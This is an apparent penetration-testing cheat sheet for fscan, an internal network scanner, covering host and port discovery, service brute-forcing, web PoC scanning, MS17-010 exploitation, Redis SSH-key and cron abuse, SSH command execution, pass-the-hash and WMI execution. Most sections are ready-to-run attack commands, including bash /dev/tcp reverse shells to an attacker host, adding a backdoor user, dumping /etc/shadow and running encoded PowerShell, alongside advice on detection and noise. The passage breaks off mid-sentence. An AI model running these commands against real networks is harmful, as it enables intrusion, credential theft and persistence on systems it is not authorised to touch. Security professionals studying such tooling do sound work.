fscan.md (43133B)
1 --- 2 title: "fscan" 3 description: "fscan all-in-one intranet scanner: host/port discovery, service brute-forcing and vuln checks." 4 category: tools 5 tags: [scanning, enumeration, internal] 6 tools: [fscan] 7 difficulty: intermediate 8 updated: "2026-08-09" 9 source: "vault:Tools/fscan.md" 10 --- 11 12 # fscan 13 14 --- 15 16 > **Note —** + [fscan](https://github.com/shadow1ng/fscan) Overview 17 > Comprehensive Go-based internal network scanning framework for penetration testing and red team operations 18 > 1. Combines host discovery, port scanning, service enumeration, and exploitation in a single binary 19 > 2. Built-in brute-force modules for SSH, SMB, RDP, FTP, databases (MySQL, MSSQL, PostgreSQL, Redis, Oracle, MongoDB, Memcached) 20 > 3. Web vulnerability scanning with PoC support (Weblogic, Shiro, Spring, Struts2) 21 > 4. Exploitation capabilities: MS17-010, Redis write SSH key/cron, FastCGI RCE, SMB pass-the-hash, WMI execution 22 > 5. Cross-platform (Windows/Linux) with no external dependencies 23 24 > **Note —** + Prerequisites 25 > 6. Network access to target range 26 > 7. On Linux: raw ICMP requires root or `CAP_NET_RAW` (use `-ping` flag as fallback) 27 > 8. On Windows: cmd.exe access for ping mode 28 > 9. Valid credentials or wordlists for brute-force operations 29 > 10. Latest stable version: v1.8.4 (May 2024); v2.0.0 in development with gRPC/API 30 31 > **Note —** + OPSEC Considerations 32 > 11. **High-noise tool**: generates significant network traffic, logged by firewalls, IDS/IPS, and target systems 33 > 12. Full TCP handshakes (not SYN-only) logged in connection logs and SIEM 34 > 13. Brute-force attempts create authentication failures (auth.log, Event ID 4625, fail2ban triggers) 35 > 14. MS17-010 exploitation can cause blue screens and is detected by all modern EDR 36 > 15. Command injection vulnerability exists in ICMP module with crafted `-hf` inputs (GitHub issue #392) 37 > 16. Default Go HTTP User-Agent (`Go-http-client/1.1`) easily fingerprinted 38 > 17. Output files contain sensitive data (credentials, vulnerabilities); secure or encrypt after use 39 40 --- 41 42 ## Host Discovery (ICMP-Based) 43 44 > **Note —** + Purpose 45 > Rapidly identify live hosts on internal networks using ICMP echo requests or command-line ping fallback 46 47 ```bash 48 # Linux (raw ICMP, requires root or CAP_NET_RAW) 49 ./fscan -h 192.168.1.0/24 50 51 # Windows 52 fscan.exe -h 192.168.1.0/24 53 54 # Command-line ping fallback (no root required on Linux) 55 ./fscan -h 192.168.1.0/24 -ping 56 57 # Skip host discovery entirely (proceed to port scanning) 58 ./fscan -h 192.168.1.0/24 -np 59 ``` 60 61 > **Note —** + Host Discovery Options 62 > 1. **-h \<target\>**: IP, range (192.168.1.1-255), CIDR (192.168.1.0/24), comma-separated IPs, or /8 (probes .1 and .254 per /16) 63 > 2. **-hf \<file\>**: Load targets from file (one per line) 64 > 3. **-hn \<exclude\>**: Exclude hosts/ranges in CIDR notation (e.g., `-hn 192.168.1.1/24`) 65 > 4. **-ping**: Use OS ping command instead of raw ICMP (safer for non-root, slower) 66 > 5. **-np**: Skip ICMP/ping entirely; proceed directly to port scanning on all specified IPs 67 > 6. **-t \<int\>**: Thread count (default 600) 68 > 7. **-time \<int\>**: Per-host timeout in seconds (default 3) 69 > 8. **-top \<int\>**: Show top N live B/C segments when scanning /8 ranges (default 10) 70 71 ```bash 72 # Standard /24 discovery scan 73 ./fscan -h 10.0.1.0/24 74 75 # Large /16 with ICMP, 800 threads 76 ./fscan -h 172.16.0.0/16 -t 800 77 78 # /8 gateway/sample discovery (scans .1 and .254 per /16) 79 ./fscan -h 192.0.0.0/8 -m icmp 80 81 # From file, exclude management subnet 82 ./fscan -hf targets.txt -hn 10.0.0.0/28 83 84 # Skip ICMP for stealth (rely on port probes) 85 ./fscan -h 10.10.10.0/24 -np 86 ``` 87 88 > **Note —** + Output Interpretation 89 > 1. **(icmp) Target \<IP\> is alive**: Host responded to ICMP echo or ping 90 > 2. **[*] Icmp alive hosts len is: N**: Summary of live hosts before port scan phase 91 > 3. For /8 scans with `-m icmp`: displays top 10 B/C segments by live host count 92 93 > **Note —** + OPSEC and Detection Notes 94 > 4. Raw ICMP is noisy and easily detected by IDS/firewalls (ICMP type 8 echo requests) 95 > 5. `-ping` uses OS utilities (logged in command history, spawns visible processes on Windows) 96 > 6. `-np` avoids ICMP entirely but may miss hosts with all ports filtered 97 > 7. Large thread counts generate traffic bursts visible in [NetFlow](https://en.wikipedia.org/wiki/NetFlow)/traffic analysis 98 > 8. **Command injection vulnerability** in ICMP module when using `-hf` with crafted IP strings (CVE-like, GitHub issue #392); sanitise inputs or use `-ping` mode (not vulnerable) 99 100 > **Note —** + Common Errors 101 > 9. **bind: operation not permitted** (Linux raw ICMP): run as root or use `-ping` 102 > 10. **No output**: firewall blocking ICMP outbound/inbound; try `-ping` or `-np` 103 > 11. **Timeout errors on large ranges**: increase `-time` or reduce `-t` thread count 104 > 12. **Command injection** (malicious IP file): avoid untrusted `-hf` inputs; use `-ping` for safer mode 105 106 --- 107 108 ## Port Scanning 109 110 > **Note —** + Purpose 111 > Comprehensive TCP port enumeration with service banner and fingerprint detection 112 113 ```bash 114 # Default ports (21,22,80,81,135,139,443,445,1433,1521,3306,5432,6379,7001,8000,8080,8089,9000,9200,11211,27017) 115 ./fscan -h 192.168.1.0/24 116 117 # Specify custom ports 118 ./fscan -h 192.168.1.10 -p 22,80,443,8080 119 120 # Port range 121 ./fscan -h 192.168.1.10 -p 1-65535 122 123 # Add ports to default list 124 ./fscan -h 192.168.1.0/24 -pa 3389,5900 125 126 # Exclude ports from scan 127 ./fscan -h 192.168.1.0/24 -pn 445 128 129 # Port groups (v1.8.3+) 130 ./fscan -h 192.168.1.0/24 -p web # common web ports 131 ./fscan -h 192.168.1.0/24 -p db # database ports 132 ./fscan -h 192.168.1.0/24 -p service # common services 133 ``` 134 135 > **Note —** + Port Scanning Options 136 > 1. **-p \<spec\>**: Port(s): single (22), list (22,80,3306), range (1-1024), or group (web/db/service/all) 137 > 2. **-pa \<ports\>**: Add ports to default list 138 > 3. **-pn \<ports\>**: Exclude ports from scan 139 > 4. **-portf \<file\>**: Load ports from file 140 > 5. **-time \<int\>**: TCP connection timeout in seconds (default 3) 141 > 6. **-np**: Skip ICMP discovery; scan all IPs regardless of ping response 142 > 7. **-t \<int\>**: Thread count (default 600) 143 144 ```bash 145 # Quick web-only scan 146 ./fscan -h 10.0.1.0/24 -p 80,443,8080,8443 -np 147 148 # Full port scan, slow and stealthy 149 ./fscan -h 192.168.1.50 -p 1-65535 -t 100 -time 5 150 151 # Default + RDP, exclude SMB 152 ./fscan -h 172.16.0.0/16 -pa 3389 -pn 445 153 154 # Database-focused scan 155 ./fscan -h 10.10.10.0/24 -p 1433,3306,5432,6379,27017,1521 156 ``` 157 158 > **Note —** + Output Interpretation 159 > 1. **\<IP\>:\<port\> open**: TCP handshake succeeded; port is open 160 > 2. **[*] alive ports len is: N**: Summary before service/vulnerability scanning begins 161 > 3. Service banners shown inline if retrieved (e.g., SSH-2.0-OpenSSH_7.4) 162 163 > **Note —** + OPSEC and Detection Notes 164 > 4. Full TCP handshake (SYN-SYN/ACK-ACK) logged by firewalls, IDS, and on target (auth.log/Security Event Log) 165 > 5. High thread counts create connection spikes ([NetFlow](https://en.wikipedia.org/wiki/NetFlow) anomaly) 166 > 6. Scanning [SMB](https://learn.microsoft.com/en-us/windows/win32/fileio/microsoft-smb-protocol-and-cifs-protocol-overview) (445), [RDP](https://learn.microsoft.com/en-us/windows-server/remote/remote-desktop-services/welcome-to-rds) (3389), or SQL (1433) is high-noise and often alerted 167 > 7. No SYN-only mode; always completes handshake (noisier than nmap SYN scan) 168 169 > **Note —** + Common Errors 170 > 8. **connection refused**: port closed 171 > 9. **timeout**: firewall drop or very slow service; increase `-time` 172 > 10. **too many open files**: reduce `-t` threads or raise OS ulimit 173 174 --- 175 176 ## Service Brute-Force 177 178 > **Note —** + Purpose 179 > Password guessing against SSH, SMB, RDP, FTP, Telnet, MySQL, MSSQL, PostgreSQL, Redis, Oracle, MongoDB, Memcached with built-in or custom wordlists 180 181 ```bash 182 # Auto-brute discovered services with default wordlists 183 ./fscan -h 192.168.1.0/24 184 185 # Skip brute-force entirely 186 ./fscan -h 192.168.1.0/24 -nobr 187 188 # Specify single username and password 189 ./fscan -h 192.168.1.0/24 -user admin -pwd password123 190 191 # Custom wordlists 192 ./fscan -h 192.168.1.0/24 -userf users.txt -pwdf passwords.txt 193 194 # Add single user/password to defaults 195 ./fscan -h 192.168.1.0/24 -usera testuser -pwda testpass 196 197 # Brute-force single module only 198 ./fscan -h 192.168.1.50 -m ssh -p 22 -userf users.txt -pwdf passwords.txt 199 ``` 200 201 > **Note —** + Brute-Force Options 202 > 1. **-nobr**: Skip all brute-force modules 203 > 2. **-user \<string\>**: Single username 204 > 3. **-userf \<file\>**: Username file (one per line) 205 > 4. **-usera \<string\>**: Add username to default list 206 > 5. **-pwd \<string\>**: Single password 207 > 6. **-pwdf \<file\>**: Password file (one per line) 208 > 7. **-pwda \<string\>**: Add password to default list 209 > 8. **-br \<int\>**: Brute-force threads per service (default 1; higher = faster but noisier) 210 > 9. **-domain \<string\>**: SMB domain (for domain-joined accounts) 211 > 10. **-m \<module\>**: Limit brute to specific service (ssh, smb, rdp, ftp, mssql, mysql, redis, postgresql, oracle, mongodb, memcached) 212 213 ```bash 214 # SSH brute with custom list, 3 concurrent attempts per host 215 ./fscan -h 10.0.1.0/24 -m ssh -userf admins.txt -pwdf rockyou-top1000.txt -br 3 216 217 # SMB domain brute-force 218 ./fscan -h 192.168.10.0/24 -m smb -domain CORP -user administrator -pwdf passwords.txt 219 220 # MySQL single-credential test 221 ./fscan -h 172.16.0.5 -m mysql -user root -pwd toor 222 223 # MSSQL with domain authentication 224 ./fscan -h 10.0.1.50 -m mssql -domain CORP -user sa -pwd sa 225 226 # PostgreSQL brute-force 227 ./fscan -h 172.16.0.20 -m postgresql -user postgres -pwdf pg_passwords.txt 228 229 # Redis check (often no password required) 230 ./fscan -h 192.168.1.0/24 -m redis 231 ``` 232 233 > **Note —** + Output Interpretation 234 > 1. **[+] ssh 192.168.1.10:22:root password**: Successful authentication 235 > 2. **[-] ssh 192.168.1.10:22 root:admin Login failed**: Failed attempt 236 > 3. Successful credentials summarised at end and saved to output file (default `result.txt`) 237 238 > **Note —** + OPSEC and Detection Notes 239 > 4. **High noise**: failed authentication attempts logged (auth.log, Event ID 4625, syslog) 240 > 5. Default brute thread = 1 per service (slow but less likely to trigger lockout) 241 > 6. Increasing `-br` risks account lockouts and IDS/IPS threshold alerts 242 > 7. [SMB](https://learn.microsoft.com/en-us/windows/win32/fileio/microsoft-smb-protocol-and-cifs-protocol-overview) brute generates [NTLM](https://learn.microsoft.com/en-us/windows-server/security/kerberos/ntlm-overview) authentication traffic (highly visible to domain controllers and SIEM) 243 > 8. [RDP](https://learn.microsoft.com/en-us/windows-server/remote/remote-desktop-services/welcome-to-rds) brute can trigger Windows account lockout policies (default 5 failed attempts) 244 > 9. Services like Redis/Memcached with no authentication are probed without brute-force 245 > 10. Database logs capture failed authentication (MySQL general/error log, MSSQL error log, PostgreSQL pg_log) 246 > 11. High-value targets; database brute-force often triggers SOC alerts 247 248 > **Note —** + Common Errors 249 > 12. **connection reset**: rate-limiting or ban (e.g., fail2ban) 250 > 13. **account locked out**: reduce `-br` threads, use smaller wordlists 251 > 14. **authentication failed** (all attempts): credentials incorrect or account disabled 252 > 15. **timeout**: service overloaded or firewall drop 253 > 16. **access denied** (databases): wrong credentials or host-based ACLs (e.g., MySQL bind-address) 254 255 --- 256 257 ## NetBIOS and SMB Enumeration 258 259 > **Note —** + Purpose 260 > Discover Windows hosts, workgroup/domain membership, hostnames, identify [domain controllers](https://learn.microsoft.com/en-us/windows-server/identity/ad-ds/get-started/virtual-dc/active-directory-domain-services-overview) 261 262 ```bash 263 # Auto NetBIOS discovery during full scan 264 ./fscan -h 192.168.1.0/24 265 266 # NetBIOS-only mode (full detail) 267 ./fscan -h 192.168.1.0/24 -m netbios 268 269 # With SMB credentials for authenticated enumeration 270 ./fscan -h 192.168.1.0/24 -m smb -user administrator -pwd password 271 ``` 272 273 > **Note —** + NetBIOS/SMB Options 274 > 1. **-m netbios**: Show verbose NetBIOS info (hostname, workgroup/domain, MAC, user) 275 > 2. **-m smb**: SMB brute/enumeration; requires `-user` and `-pwd` for authenticated access 276 > 3. **-domain \<string\>**: Specify domain for SMB authentication 277 > 4. **-pn 445**: Skip SMB entirely (to avoid noisy SMB scanning) 278 279 ```bash 280 # Quick NetBIOS scan for domain controllers 281 ./fscan -h 10.0.0.0/16 -m netbios -p 139 282 283 # SMB authenticated enumeration 284 ./fscan -h 192.168.10.0/24 -m smb -domain CORP -user administrator -pwd P@ssw0rd 285 286 # Skip SMB ports entirely 287 ./fscan -h 172.16.0.0/16 -pn 445,139 288 ``` 289 290 > **Note —** + Output Interpretation 291 > 1. **[*] NetBios 192.168.1.10 WORKGROUP\\HOSTNAME**: Workgroup member 292 > 2. **[+] DC 192.168.1.10 DOMAIN\\HOSTNAME**: Domain controller (DC flag) 293 > 3. `-m netbios` shows full table: hostname, workgroup/domain, MAC, logged-in user (if available) 294 295 > **Note —** + OPSEC and Detection Notes 296 > 4. NetBIOS queries (UDP 137, TCP 139) are low-noise but logged by domain controllers 297 > 5. [SMB](https://learn.microsoft.com/en-us/windows/win32/fileio/microsoft-smb-protocol-and-cifs-protocol-overview) (TCP 445) authenticated enumeration generates Windows Event ID 4624/4625, highly visible in SIEM 298 > 6. Domain controller identification is sensitive; enumerating DCs alerts domain administrators 299 > 7. Anonymous SMB enumeration often blocked (modern Windows); requires valid credentials 300 301 > **Note —** + Common Errors 302 > 8. **access denied**: SMB signing required, wrong credentials, or anonymous enumeration blocked 303 > 9. **connection refused**: SMB disabled or firewall 304 > 10. **timeout**: network latency; increase `-time` 305 306 --- 307 308 ## MS17-010 Detection and Exploitation 309 310 > **Note —** + [MS17-010](https://en.wikipedia.org/wiki/EternalBlue) (EternalBlue) Overview 311 > Critical SMB vulnerability affecting Windows XP–2008R2, unpatched Windows 7/2008 systems 312 313 > **Note —** + Critical Warning 314 > 1. **Extremely noisy**: MS17-010 exploit causes SMB crashes (blue screen potential) 315 > 2. Detected by all modern EDR/IDS/IPS systems 316 > 3. Exploitation = system-level compromise with high-integrity logs (Event ID 4688, 4672) 317 > 4. **Only use on authorised lab/pentest environments** 318 > 5. Some antivirus/EDR block or quarantine fscan.exe due to MS17-010 module 319 320 ```bash 321 # Auto-detect MS17-010 during full scan 322 ./fscan -h 192.168.1.0/24 323 324 # MS17-010 detection only 325 ./fscan -h 192.168.1.0/24 -m ms17010 326 327 # Exploit with built-in shellcode (add user) 328 ./fscan -h 192.168.1.50 -m ms17010 -sc add 329 ``` 330 331 > **Note —** + MS17-010 Options 332 > 1. **-m ms17010**: Enable MS17-010 module 333 > 2. **-sc \<type\>**: Shellcode action; `add` = add user (hardcoded in source; customise in `ms17010-exp.go`) 334 > 3. Custom shellcode: edit `Plugins/ms17010-exp.go` before compiling 335 336 ```bash 337 # Scan /16 for vulnerable hosts 338 ./fscan -h 10.0.0.0/16 -m ms17010 -np 339 340 # Exploit single host, add user 341 ./fscan -h 192.168.1.75 -m ms17010 -sc add 342 343 # Detection only (no exploitation) 344 ./fscan -h 172.16.0.0/24 -m ms17010 345 ``` 346 347 > **Note —** + Output Interpretation 348 > 1. **[+] MS17-010 192.168.1.50 (Windows 7 Professional 7601 Service Pack 1)**: Vulnerable 349 > 2. **[*] MS17-010 Exploit success**: Shellcode executed (if `-sc` used) 350 > 3. **[-] MS17-010 192.168.1.10 Not vulnerable**: Patched or non-vulnerable OS 351 352 > **Note —** + Exploitation Notes 353 > 4. Built-in shellcode (`-sc add`) adds user `fscan`/`fscan123` (customise in source before compiling) 354 > 5. Prefer external tools ([Metasploit](https://www.metasploit.com/) `exploit/windows/smb/ms17_010_eternalblue`) for stable exploitation 355 > 6. MS17-010 module uses DoublePulsar-like technique; unreliable on production systems 356 357 > **Note —** + Common Errors 358 > 7. **Not vulnerable**: host patched, non-vulnerable OS (Windows 10+, Server 2012+), or SMB disabled 359 > 8. **Exploit failed**: target unstable, incorrect shellcode, or EDR blocked 360 > 9. **Blue screen/crash**: target system unstable; MS17-010 exploit is inherently risky 361 362 --- 363 364 ## Web Fingerprinting and Title Extraction 365 366 > **Note —** + Purpose 367 > Identify web frameworks, CMS, OA systems, and extract HTTP titles for situational awareness 368 369 ```bash 370 # Auto web fingerprint during full scan 371 ./fscan -h 192.168.1.0/24 372 373 # Scan specific URL 374 ./fscan -u http://192.168.1.50:8080 375 376 # Scan URLs from file 377 ./fscan -uf urls.txt 378 379 # Skip web scanning 380 ./fscan -h 192.168.1.0/24 -nopoc 381 ``` 382 383 > **Note —** + Web Fingerprinting Options 384 > 1. **-u \<url\>**: Single URL (v1.8.1+ supports comma-separated URLs) 385 > 2. **-uf \<file\>**: URL file (one per line) 386 > 3. **-nopoc**: Skip web vulnerability/fingerprint scanning 387 > 4. **-wt \<int\>**: Web request timeout in seconds (default 5) 388 > 5. **-proxy \<url\>**: HTTP proxy for web requests (e.g., `-proxy http://127.0.0.1:8080`) 389 > 6. **-cookie \<string\>**: Set cookies (e.g., `-cookie "session=abc123"`) 390 391 ```bash 392 # Scan /24 for web services 393 ./fscan -h 10.0.1.0/24 -p 80,443,8080,8443 394 395 # Single URL with proxy (Burp Suite) 396 ./fscan -u https://192.168.1.100 -proxy http://127.0.0.1:8080 397 398 # URL file with extended timeout 399 ./fscan -uf web_targets.txt -wt 10 400 401 # Fast scan, skip PoC and fingerprinting 402 ./fscan -h 172.16.0.0/16 -nopoc -nobr 403 ``` 404 405 > **Note —** + Output Interpretation 406 > 1. **[*] WebTitle http://192.168.1.10:80 code:200 len:1234 title:Apache Test Page**: HTTP status, content length, page title 407 > 2. **[*] http://192.168.1.50:8080 [Tomcat]**: Framework/CMS fingerprint detected 408 409 > **Note —** + OPSEC and Detection Notes 410 > 1. HTTP requests logged in web server access logs (Apache access.log, IIS logs, nginx access.log) 411 > 2. User-Agent string default is Go HTTP client (easily fingerprinted; not customisable in fscan) 412 > 3. Requests to common paths (e.g., `/favicon.ico`, CMS-specific paths) may trigger WAF/IDS 413 > 4. Low-noise activity unless combined with PoC scanning 414 > 5. TLS 1.0+ supported (TLS 1.0 minimum set in v1.8.3) 415 416 > **Note —** + Common Errors 417 > 6. **timeout**: slow server or network; increase `-wt` 418 > 7. **connection refused**: service down or firewall 419 > 8. **SSL handshake failed**: certificate issues; fscan accepts invalid certificates by default 420 421 --- 422 423 ## Web Vulnerability Scanning (PoC/xray) 424 425 > **Note —** + Purpose 426 > Detect web vulnerabilities using built-in PoCs and [xray](https://github.com/chaitin/xray)-compatible PoC files (Weblogic, Shiro, Spring, Struts2, etc.) 427 428 ```bash 429 # Auto PoC scan during full scan 430 ./fscan -h 192.168.1.0/24 431 432 # PoC scan single URL 433 ./fscan -u http://192.168.1.50:7001 434 435 # Use custom PoC directory 436 ./fscan -u http://target.local -pocpath ./custom_pocs/ 437 438 # Filter PoCs by name 439 ./fscan -u http://target.local -pocname weblogic 440 441 # Skip PoC scanning 442 ./fscan -h 192.168.1.0/24 -nopoc 443 444 # Full Shiro key brute (100 keys instead of 10) 445 ./fscan -u http://192.168.1.50:8080 -full 446 ``` 447 448 > **Note —** + PoC Scanning Options 449 > 1. **-nopoc**: Skip all web PoC scanning 450 > 2. **-pocpath \<dir\>**: Directory with custom xray-format PoC YAML files 451 > 3. **-pocname \<string\>**: Fuzzy match PoC name (e.g., `weblogic`, `shiro`, `spring`) 452 > 4. **-full**: Run exhaustive PoC scans (e.g., [Shiro](https://shiro.apache.org/) 100 keys instead of default 10; backup file fuzzing) 453 > 5. **-dns**: Enable DNS log-based PoCs (requires external DNS log service; not built-in) 454 > 6. **-num \<int\>**: PoC request rate/concurrency (default 20) 455 > 7. **-proxy \<url\>**: HTTP proxy for PoC requests 456 > 8. **-cookie \<string\>**: Custom cookies for PoC requests 457 458 ```bash 459 # Weblogic CVE scan 460 ./fscan -u http://10.0.1.50:7001 -pocname weblogic 461 462 # Shiro full key brute (100 keys) 463 ./fscan -u http://192.168.1.100:8080 -pocname shiro -full 464 465 # Scan with xray PoCs via Burp proxy 466 ./fscan -u http://target.local -pocpath /opt/xray/pocs/ -proxy http://127.0.0.1:8080 467 468 # Skip PoC, web fingerprint only 469 ./fscan -h 172.16.0.0/24 -nopoc 470 ``` 471 472 > **Note —** + Built-in PoC Coverage 473 > 1. [Weblogic](https://www.oracle.com/middleware/technologies/weblogic.html) (multiple CVEs) 474 > 2. [Apache Shiro](https://shiro.apache.org/) (default 10 keys; 100 with `-full`) 475 > 3. [Spring Framework](https://spring.io/) (CVE-2021-21234, CVE-2022-22965, etc.) 476 > 4. [Struts2](https://struts.apache.org/) (multiple CVEs) 477 > 5. [ThinkPHP](http://www.thinkphp.cn/) vulnerabilities 478 > 6. Custom xray-compatible PoCs (partial compatibility) 479 480 > **Note —** + Output Interpretation 481 > 1. **[+] PoC-2021-12345 http://192.168.1.50:7001**: Vulnerability detected (PoC name, URL) 482 > 2. No output = no vulnerabilities detected (or `-nopoc` used) 483 484 > **Note —** + OPSEC and Detection Notes 485 > 1. **High noise**: exploitation attempts logged in web/application logs, WAF, IDS/IPS 486 > 2. Payload strings (e.g., `{{7*7}}`, JNDI URLs) trigger WAF signatures 487 > 3. `-full` mode sends many requests (Shiro 100 keys = 100+ requests); rate-limits or bans likely 488 > 4. DNS log PoCs require external service (e.g., [Ceye](http://ceye.io/), [Burp Collaborator](https://portswigger.net/burp/documentation/collaborator)); not stealthy 489 > 5. Some PoCs attempt command execution (whoami, DNS lookups); logged as suspicious activity 490 491 > **Note —** + Common Errors 492 > 6. **timeout**: slow application or network; increase `-wt` 493 > 7. **WAF block**: 403/429 responses; reduce `-num`, use `-proxy`, or abandon 494 > 8. **PoC failed**: target not vulnerable, PoC outdated, or environmental issue 495 > 9. Xray PoC incompatibility: some xray v2 PoCs unsupported; verify fscan version and PoC format 496 497 --- 498 499 ## Redis Exploitation 500 501 > **Note —** + Purpose 502 > Exploit unauthenticated or authenticated [Redis](https://redis.io/) to write SSH public key or cron reverse shell 503 504 > **Note —** + Prerequisites 505 > 1. Redis (port 6379) open and writable 506 > 2. Target Linux system with Redis running as user with SSH or cron access 507 > 3. Modern Redis often requires authentication; unauthenticated instances rare but high-value 508 509 ```bash 510 # Auto-detect Redis during scan (shows unauthorised status) 511 ./fscan -h 192.168.1.0/24 512 513 # Write SSH public key to target 514 ./fscan -h 192.168.1.50 -m redis -rf id_rsa.pub 515 516 # Write cron reverse shell 517 ./fscan -h 192.168.1.50 -m redis -rs 192.168.1.100:4444 518 519 # Skip Redis exploitation 520 ./fscan -h 192.168.1.0/24 -noredis 521 ``` 522 523 > **Note —** + Redis Exploitation Options 524 > 1. **-m redis**: Redis module (detection + exploitation if `-rf` or `-rs` used) 525 > 2. **-rf \<file\>**: SSH public key file to write to `~/.ssh/authorized_keys` 526 > 3. **-rs \<IP:port\>**: Attacker IP:port for reverse shell via cron (e.g., `-rs 10.0.1.5:6666`) 527 > 4. **-noredis**: Skip Redis security tests (detection only, no exploitation) 528 > 5. **-pwd \<string\>**: Redis password (if authentication enabled) 529 530 ```bash 531 # Generate SSH key, write to Redis target 532 ssh-keygen -t rsa -f fscan_key 533 ./fscan -h 10.0.1.75 -m redis -rf fscan_key.pub 534 ssh -i fscan_key redis@10.0.1.75 535 536 # Cron reverse shell exploitation 537 nc -lvnp 4444 # listener on attacker machine 538 ./fscan -h 192.168.1.50 -m redis -rs 192.168.1.100:4444 539 540 # Authenticated Redis exploitation 541 ./fscan -h 172.16.0.10 -m redis -pwd foobared -rf id_rsa.pub 542 ``` 543 544 > **Note —** + Output Interpretation 545 > 1. **[+] Redis 192.168.1.50:6379 unauthorized file:/var/lib/redis/dump.rdb**: No authentication, writable, file path disclosed 546 > 2. **[+] Redis 192.168.1.50 Write SSH Key Success**: SSH key written to `authorized_keys` 547 > 3. **[+] Redis 192.168.1.50 Write Cron Success**: Cron job created for reverse shell 548 549 > **Note —** + Exploitation Technique Notes 550 > 4. Targets Linux only (SSH key / cron paths hardcoded for Linux) 551 > 5. Redis exploitation removed from default scan in some versions; use `-m redis` explicitly 552 > 6. Cron reverse shell format: `*/1 * * * * bash -i >& /dev/tcp/<IP>/<PORT> 0>&1` 553 554 > **Note —** + OPSEC and Detection Notes 555 > 7. **High noise**: writing files/cron jobs creates forensic artefacts (`authorized_keys`, `/var/spool/cron`) 556 > 8. Redis logs (`redis.log`) capture commands (`CONFIG SET`, `SET`, `SAVE`) 557 > 9. Cron reverse shell spawns network connection (logged in NetFlow, firewall, and process logs) 558 > 10. SSH key persistence obvious in `~/.ssh/authorized_keys` 559 560 > **Note —** + Common Errors 561 > 11. **NOAUTH Authentication required**: Redis password set; use `-pwd` or skip 562 > 12. **Permission denied**: Redis user lacks write access to `/root/.ssh/` or `/var/spool/cron` 563 > 13. **CONFIG SET failed**: Redis `config` command disabled (common hardening) 564 > 14. Cron not triggered: cron daemon not running, or syntax error in cron entry 565 566 --- 567 568 ## SSH Command Execution (Post-Exploit) 569 570 > **Note —** + Purpose 571 > Execute commands on SSH targets after successful brute-force or using known credentials/SSH key 572 573 ```bash 574 # Execute command after successful SSH brute 575 ./fscan -h 192.168.1.0/24 -m ssh -c "whoami; id" 576 577 # Use SSH private key + command 578 ./fscan -h 192.168.1.50 -m ssh -sshkey id_rsa -user root -c "uname -a" 579 580 # Brute + command on custom port 581 ./fscan -h 10.0.1.0/24 -m ssh -p 2222 -c "cat /etc/passwd" 582 ``` 583 584 > **Note —** + SSH Command Execution Options 585 > 1. **-c \<string\>**: Command to execute (semicolon-separated for multiple commands) 586 > 2. **-sshkey \<file\>**: SSH private key file (e.g., `id_rsa`) 587 > 3. **-user \<string\>**: Username (required with `-sshkey`) 588 > 4. **-m ssh**: SSH module 589 > 5. **-p \<port\>**: Custom SSH port 590 591 ```bash 592 # Post-exploit enumeration 593 ./fscan -h 192.168.1.75 -m ssh -user admin -pwd admin -c "whoami; hostname; ip a" 594 595 # SSH key-based command execution 596 ./fscan -h 10.0.1.100 -m ssh -sshkey ~/.ssh/pentest_key -user root -c "cat /etc/shadow" 597 598 # Reverse shell 599 ./fscan -h 192.168.1.50 -m ssh -user admin -pwd admin -c "bash -i >& /dev/tcp/192.168.1.100/4444 0>&1" 600 ``` 601 602 > **Note —** + Output Interpretation 603 > 1. **[+] SSH 192.168.1.50:22:root password**: Credentials valid 604 > 2. Command output printed inline (stdout from SSH session) 605 606 > **Note —** + OPSEC and Detection Notes 607 > 1. SSH logins logged (`auth.log`, `/var/log/secure`, Event Logs on some systems) 608 > 2. Command execution visible in shell history (`.bash_history`, `.zsh_history`) unless overridden 609 > 3. Processes spawned by commands visible in `ps`, `/proc`, and EDR telemetry 610 > 4. Network connections from reverse shells logged in NetFlow, firewall, and process network logs 611 > 5. Low-noise login (SSH key-based) preferred over brute-force 612 613 > **Note —** + Technical Notes 614 > 6. SSH key support added in v1.6.2 615 > 7. Commands executed in non-interactive shell; some commands requiring TTY may fail 616 > 8. Workaround for TTY requirements: `python -c 'import pty; pty.spawn("/bin/bash")'` 617 618 > **Note —** + Common Errors 619 > 9. **Permission denied (publickey)**: SSH key not accepted; use password authentication (`-pwd`) 620 > 10. **timeout**: network latency or SSH tarpit; increase `-time` 621 > 11. Command failed: syntax error, missing binary, or insufficient privileges 622 623 --- 624 625 ## SMB Pass-the-Hash and WMIExec 626 627 > **Note —** + Purpose 628 > Lateral movement via SMB using [NTLM hash](https://learn.microsoft.com/en-us/windows-server/security/kerberos/ntlm-overview) (pass-the-hash) or remote command execution via [WMI](https://learn.microsoft.com/en-us/windows/win32/wmisdk/wmi-start-page) (no output) 629 630 ```bash 631 # SMB pass-the-hash 632 ./fscan -h 192.168.1.0/24 -m smb2 -user administrator -hash aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0 633 634 # WMI command execution (no echo) 635 ./fscan -h 192.168.1.50 -m wmiexec -user administrator -pwd Password1 -c "whoami" 636 637 # WMI with hash 638 ./fscan -h 192.168.1.50 -m wmiexec -user administrator -hash <NTLM_hash> -c "net user fscan fscan123 /add" 639 ``` 640 641 > **Note —** + Pass-the-Hash Options 642 > 1. **-m smb2**: SMB pass-the-hash module 643 > 2. **-m wmiexec**: WMI remote execution (no output returned) 644 > 3. **-hash \<string\>**: NTLM hash (LM:NTLM or NTLM-only; LM can be `aad3b435b51404eeaad3b435b51404ee` for modern hashes) 645 > 4. **-user \<string\>**: Username 646 > 5. **-pwd \<string\>**: Password (for WMI without hash) 647 > 6. **-c \<string\>**: Command to execute (WMI only) 648 > 7. **-domain \<string\>**: Domain (optional, for domain accounts) 649 > 8. **-wmi**: Enable WMI scanning (auto-enabled with `-m wmiexec`) 650 651 ```bash 652 # Pass-the-hash SMB authentication test 653 ./fscan -h 10.0.1.0/24 -m smb2 -user admin -hash 00000000000000000000000000000000:7ECFFFF0C3548187607A14BAD0F88BB1 654 655 # WMI command execution (blind) 656 ./fscan -h 192.168.1.100 -m wmiexec -user administrator -pwd P@ssw0rd -c "powershell -enc <base64_payload>" 657 658 # Domain pass-the-hash 659 ./fscan -h 172.16.0.50 -m smb2 -domain CORP -user Administrator -hash <hash> 660 ``` 661 662 > **Note —** + Output Interpretation 663 > 1. **[+] SMB 192.168.1.50:445 administrator \<hash\>**: Pass-the-hash succeeded 664 > 2. **[+] WMIExec 192.168.1.50 Success**: Command sent (no output returned; verify via other means) 665 666 > **Note —** + OPSEC and Detection Notes 667 > 1. **High noise**: [NTLM](https://learn.microsoft.com/en-us/windows-server/security/kerberos/ntlm-overview) authentication logged (Event ID 4624 type 3, 4776); pass-the-hash 